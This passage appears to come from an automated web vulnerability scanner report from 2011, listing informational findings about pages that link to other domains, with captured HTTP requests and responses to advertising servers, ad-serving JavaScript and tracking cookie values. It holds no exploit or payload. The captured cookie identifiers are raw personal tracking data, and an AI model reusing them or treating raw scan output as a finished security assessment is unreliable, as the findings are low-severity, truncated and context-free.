document.write (' SRC="http://ad.doubleclick.net/adj/N5877.774.5057472001621/B5104260;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/323024100/x80/Bloomberg/3526793/3526793.html/72634857383032345a51594144454b2b?;ord=323024100?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
/story/L44/323024100/x80/Bloomberg/3526793/3526793.html/72634857383032345a51594144454b2b?http://ad.doubleclick.net/jump/N5877.774.5057472001621/B5104260;sz=88x31;ord=323024100?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N5877.774.5057472001621/B5104260;sz=88x31;ord=323024100?" BORDER=0 WIDTH=88 HEIGHT=31 ALT="Advertisement"></A>
...[SNIP]...
</NOSCRIPT>\n');
}
if (position == 'x81') {
document.write ('<IFRAME id="x81_600377597" SRC="http://ad-emea.doubleclick.net/adi/N568.273558.BLOOMBERG1/B3885816.3;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/600377597/x81/Bloomberg/3848309/DowJones_DART_NewsTradebar_88x31.html/72634857383032345a51594144454b2b?;ord=600377597?" WIDTH=88 HEIGHT=31 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad-emea.doubleclick.net/adj/N568.273558.BLOOMBERG1/B3885816.3;abr=!ie;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/600377597/x81/Bloomberg/3848309/DowJones_DART_NewsTradebar_88x31.html/72634857383032345a51594144454b2b?;ord=600377597?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
es_DART_NewsTradebar_88x31.html/72634857383032345a51594144454b2b?http://ad-emea.doubleclick.net/jump/N568.273558.BLOOMBERG1/B3885816.3;abr=!ie4;abr=!ie5;sz=88x31;ord=600377597?">\n');
document.write ('<IMG SRC="http://ad-emea.doubleclick.net/ad/N568.273558.BLOOMBERG1/B3885816.3;abr=!ie4;abr=!ie5;sz=88x31;ord=600377597?" BORDER=0 WIDTH=88 HEIGHT=31 ALT="Click Here"></A>
...[SNIP]...
</IFRAME>\n');
}
if (position == 'x82') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad-emea.doubleclick.net/adj/N1379.290479.MEDIABUYER/B5191871;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/2052462841/x82/Bloomberg/3750448/Citifx_Button_88x31_March11th.html/72634857383032345a51594144454b2b?;ord=2052462841?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
omberg/3750448/Citifx_Button_88x31_March11th.html/72634857383032345a51594144454b2b?http://ad-emea.doubleclick.net/jump/N1379.290479.MEDIABUYER/B5191871;sz=88x31;ord=2052462841?">\n');
document.write ('<IMG SRC="http://ad-emea.doubleclick.net/ad/N1379.290479.MEDIABUYER/B5191871;sz=88x31;ord=2052462841?" BORDER=0 WIDTH=88 HEIGHT=31 ALT="Advertisement"></A>
...[SNIP]...
ts/international/story/L44/1061312212/x83/Bloomberg/2956629_BH/bannerad_animloop.gif.html/72634857383032345a51594144454b2b?http://preview.bloomberg.com/mobile/" target="_blank"> \n');
document.write ('<img src="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/Bloomberg/2956629_BH/bannerad_animloop.gif/1285946185" border="0" \n');
document.write ('width="88" height="31" alt=""/>
</a>
...[SNIP]...

19.13. http://ads1.revenue.net/j

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.revenue.net
Path:   /j

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /j?site_id=12169&pplacement_id=1&r_num=58437537 HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo3MzQzODkxNDoxOjA6MTMwMzU3NzM4MjoxsAEEMzQxODI6LSkEAIwEmgJ8dnQEIAdOATE3dAVgDAIzNDExNylEAQktOjEzMDM1MzQxODIRAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:54 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CAB92OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDkxNDoxsAEEMDE3MTQ6LSkEAAcxMzA1MjAxNzE0EQAA; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 331

document.write('<SCRIPT TYPE="text/javascript" SRC="http://panther1.cpxinteractive.com/mz/ds.js"></SCRIPT>');


document.write('<script language="JavaScript" src="http://ads1.revenue.net/load/2
...[SNIP]...

19.14. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /pixel?nid=media6degrees HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Found
Location: http://idpix.media6degrees.com/orbserv/hbpix?pixId=2725&tpd=CAESEB9wkIpmi6GvAUSnjgAPob4&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 11:49:43 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 299
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://idpix.media6degrees.com/orbserv/hbpix?pixId=2725&amp;tpd=CAESEB9wkIpmi6GvAUSnjgAPob4&amp;cver=1">here</A>
...[SNIP]...

19.15. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /pixel?nid=audsci HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Found
Location: http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 11:38:27 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 341
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&amp;cver=1">here</A>
...[SNIP]...

19.16. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /pixel?nid=turn1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=40&mpid=-1&fpid=-1&rnd=7978057364051197680&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Found
Location: http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEA4m3NbIVFSubIriNyJB6xg&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 11:38:25 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://r.turn.com/r/bd?ddc=1&amp;pid=18&amp;uid=CAESEA4m3NbIVFSubIriNyJB6xg&amp;cver=1">here</A>
...[SNIP]...

19.17. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1979187633561026&output=html&h=250&slotname=7597199020&w=300&lmt=1305218253&flash=10.2.154&url=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&dt=1305200253399&bpp=8&shv=r20110427&jsv=r20110427&correlator=1305200253495&frm=0&adk=1684246542&ga_vid=790518761.1303930135&ga_sid=1305200254&ga_hid=1229711023&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=211&xpc=zWqV5KscOz&p=http%3A//www.bloomberg.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:37:38 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13474

<!doctype html><html><head><style>a{color:#0033cc}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html%26hl%3Den%26client%3Dca-pub-1979187633561026%26adU%3DAmoLatina.com%26adT%3DHottest%2BBrazilian%2BGirls%26adU%3Dwww.WisdomTree.com/Large-Dividends%26adT%3DLarge%2BDividend%2BStocks%26adU%3Dwww.Sovereign-Investor.com%26adT%3D%252475%2BSilver%253F%26gl%3DUS&amp;usg=AFQjCNHWPgCzZKsTltLjbFuLVuXLe6zcjg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.18. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4453256361272375&output=html&h=60&slotname=7817023585&w=468&lmt=1302852174&flash=10.2.154&url=http%3A%2F%2Fwww.vcprodatabase.com%2F&dt=1305198148368&bpp=5&shv=r20110427&jsv=r20110427&correlator=1305198148409&frm=0&adk=3509212296&ga_vid=1338690755.1305198149&ga_sid=1305198149&ga_hid=931142865&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=909&bih=964&eid=36813005&fu=0&ifi=1&dtd=1077&xpc=0qMkZHjNDT&p=http%3A//www.vcprodatabase.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:02:31 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 5245

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.vcprodatabase.com/%26hl%3Den%26client%3Dca-pub-4453256361272375%26adU%3Dwww.hardmoneybankers.com%26adT%3DPrivate/Hard%2BMoney%2BLoans%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26gl%3DUS&amp;usg=AFQjCNF4NPVpdQWtdgxlyyYIr-24dl6l-Q" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...

19.19. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-8313336773978288&output=html&h=125&slotname=9131094990&w=125&lmt=1305218266&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&dt=1305200266480&shv=r20110427&jsv=r20110427&saldr=1&correlator=1305200266507&frm=1&adk=3423698080&ga_vid=790518761.1303930135&ga_sid=1305200254&ga_hid=505836890&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&ifk=502837744&eid=33895150&fu=4&ifi=1&dtd=30 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:38:09 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 9591

<!doctype html><html><head><style>a{color:#0033cc}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html%26hl%3Den%26client%3Dca-pub-8313336773978288%26adU%3Dwww.BarclayHedge.com%26adT%3DHedge%2BFund%2BDirectory%26gl%3DUS&amp;usg=AFQjCNH-A1nwGSLE2d-P-boWFs4NzT2_IA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.20. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305218308&channel=Topics_leaderboard&ad_type=image&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=10.2.154&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&adsafe=high&targeting=site_content&dt=1305200308907&bpp=3&shv=r20110427&jsv=r20110427&correlator=1305200308919&frm=0&adk=2225227735&ga_vid=33945028.1305200309&ga_sid=1305200309&ga_hid=872394992&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1046&bih=964&ref=http%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F10%2Fapollo-to-buy-out-american-idol-owner%2F&fu=0&ifi=1&dtd=47&xpc=ipKQdjql95&p=http%3A//topics.nytimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:40:24 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3600

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/%253Finline%253Dnyt-classifier%26hl%3Den%26client%3Dca-nytimes_display_html%26adU%3Dwww.forsalebyowner.com%26adT%3DImageAd%26gl%3DUS%26hideleadgen%3D1&amp;usg=AFQjCNGTPrDqWM6BX9J08BYJD4g1Qryo8w" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.21. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305216969&channel=Topics_leaderboard&ad_type=image&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=10.2.154&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&adsafe=high&targeting=site_content&dt=1305198969022&bpp=2&shv=r20110427&jsv=r20110427&correlator=1305198969026&frm=0&adk=2225227735&ga_vid=1802707015.1305198969&ga_sid=1305198969&ga_hid=556056449&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=114&xpc=gLROVOgUps&p=http%3A//topics.nytimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:16:11 GMT
